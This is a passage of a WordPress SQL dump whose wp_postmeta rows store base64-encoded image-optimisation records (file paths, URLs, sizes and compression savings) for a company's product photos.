vaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUxMywidGltZSI6MTQ4MzU2MzMwMCwiaWQiOjE3ODh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NTMsInRpbWUiOjE0ODM1NjMzMDQsImlkIjoxNzg4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDk1LCJ0aW1lIjoxNDgzNTYzMzA3LCJpZCI6MTc4OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEyMTUsInRpbWUiOjE0ODM1NjMzMTEsImlkIjoxNzg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MTYsInRpbWUiOjE0ODM1NjMzMTQsImlkIjoxNzg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MjYsInRpbWUiOjE0ODM1NjMzMTcsImlkIjoxNzg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NDIsInRpbWUiOjE0ODM1NjMzMjIsImlkIjoxNzg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NpbGljb25lLW9pbC1sdWJyaWNhbnQtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo3NzQsInRpbWUiOjE0ODM1NjMzMjUsImlkIjoxNzg4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU2lsaWNvbmUtb2lsLWx1YnJpY2FudC05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TaWxpY29uZS1vaWwtbHVicmljYW50LTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzgwLCJ0aW1lIjoxNDgzNTYzMzI4LCJpZCI6MTc4OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29180, 1787, 'wpfc_optimisation_reduction', '21461'); 
INSERT INTO `wp_postmeta` VALUES (29181, 1787, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MzMzMywiaWQiOiIxNzg3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcxNywidGltZSI6MTQ4MzU2MzMzNiwiaWQiOjE3ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNTg0LCJ0aW1lIjoxNDgzNTYzMzQwLCJpZCI6MTc4N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIyNDQsInRpbWUiOjE0ODM1NjMzNDQsImlkIjoxNzg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMDM1MiwidGltZSI6MTQ4MzU2MzM0OCwiaWQiOjE3ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjUsInRpbWUiOjE0ODM1NjMzNTEsImlkIjoxNzg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDY0LCJ0aW1lIjoxNDgzNTYzMzU0LCJpZCI6MTc4N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUxMiwidGltZSI6MTQ4MzU2MzM1OCwiaWQiOjE3ODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDEwLCJ0aW1lIjoxNDgzNTYzMzYxLCJpZCI6MTc4N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MzkyLCJ0aW1lIjoxNDgzNTYzMzY1LCJpZCI6MTc4N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTU2LCJ0aW1lIjoxNDgzNTYzMzY4LCJpZCI6MTc4N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTY0LCJ0aW1lIjoxNDgzNTYzMzcxLCJpZCI6MTc4N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04OTAwLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzczLCJ0aW1lIjoxNDgzNTYzMzc1LCJpZCI6MTc4N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg5MDAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODkwMC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM2OCwidGltZSI6MTQ4MzU2MzM3OCwiaWQiOjE3ODd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29182, 1786, 'wpfc_optimisation_reduction', '28076'); 
INSERT INTO `wp_postmeta` VALUES (29183, 1786, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MzM4MywiaWQiOiIxNzg2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk2NCwidGltZSI6MTQ4MzU2MzM4NiwiaWQiOjE3ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMzA0LCJ0aW1lIjoxNDgzNTYzMzg5LCJpZCI6MTc4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYVN5cy04ODAwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI5NDUsInRpbWUiOjE0ODM1NjMzOTMsImlkIjoxNzg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhU3lzLTg4MDAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFTeXMtODgwMC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzgxNiwidGltZSI6MTQ4MzU2MzM5NywiaWQiOjE3ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJs